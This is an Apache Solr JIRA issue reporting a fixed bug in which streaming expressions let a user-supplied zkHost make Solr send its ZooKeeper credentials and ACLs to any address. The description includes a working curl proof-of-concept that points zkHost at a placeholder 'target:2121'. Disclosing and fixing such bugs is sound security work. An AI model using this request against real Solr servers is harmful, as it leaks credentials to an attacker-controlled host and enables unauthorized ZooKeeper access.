[SOLR-17098] Zookeeper Credential Information Disclosure bug via Streaming Expressions - ASF JIRA

Attach files

Attach Screenshot

Voters

Watch issue

Watchers

Create sub-task

Link

Clone

Update Comment Author

Replace String in Comment

Update Comment Visibility

Delete Comments

XML

Word

Printable

JSON

Details

Type: Bug
Status: Closed
Priority: Blocker
Resolution: Fixed
Affects Version/s: None
Fix Version/s: 8.11.3, 9.4.1
Component/s: streaming expressions
Labels:
None

Description

Security list thread: https://lists.apache.org/thread/byrxkqk15mh6960wmx4r851srosgkvbh

ZK Credentials and ACLs can be exposed to any endpoint when the Streaming Handler is used:

curl --data-urlencode 'expr=search(collection1,
zkHost="target:2121",
qt="/export",
q=":",
fl="id,a_s,a_i,a_f",
sort="a_f asc, a_i asc")' http://localhost:8983/solr/demo/stream

In the command above, if the Solr instance has any Zookeeper Credentials or ACLs provided, then that information will be sent to the "target:2121" address. An attacker could set up a mock Zookeeper service to obtain the credentials, and then gain access to the Solr's Zookeeper Nodes.

Attachments

SOLR-17098.diff
05/Dec/23 20:19
28 kB
Houston Putman
SOLR-17098-1.diff
20/Dec/23 21:24
26 kB
Houston Putman

Activity

Comment

This comment will be Viewable by All Users Viewable by All Users

Cancel

People

Assignee:: Houston Putman

Reporter:: Houston Putman

Votes:: 0 Vote for this issue

Watchers:: 3 Start watching this issue

Dates

Created:: 05/Dec/23 19:48

Updated:: 09/Feb/24 16:43

Resolved:: 10/Jan/24 23:28

Agile

View on Board

Zookeeper Credential Information Disclosure bug via Streaming Expressions

Details

Description

Attachments

Attachments

Activity

People

Dates

Agile

Slack

Issue deployment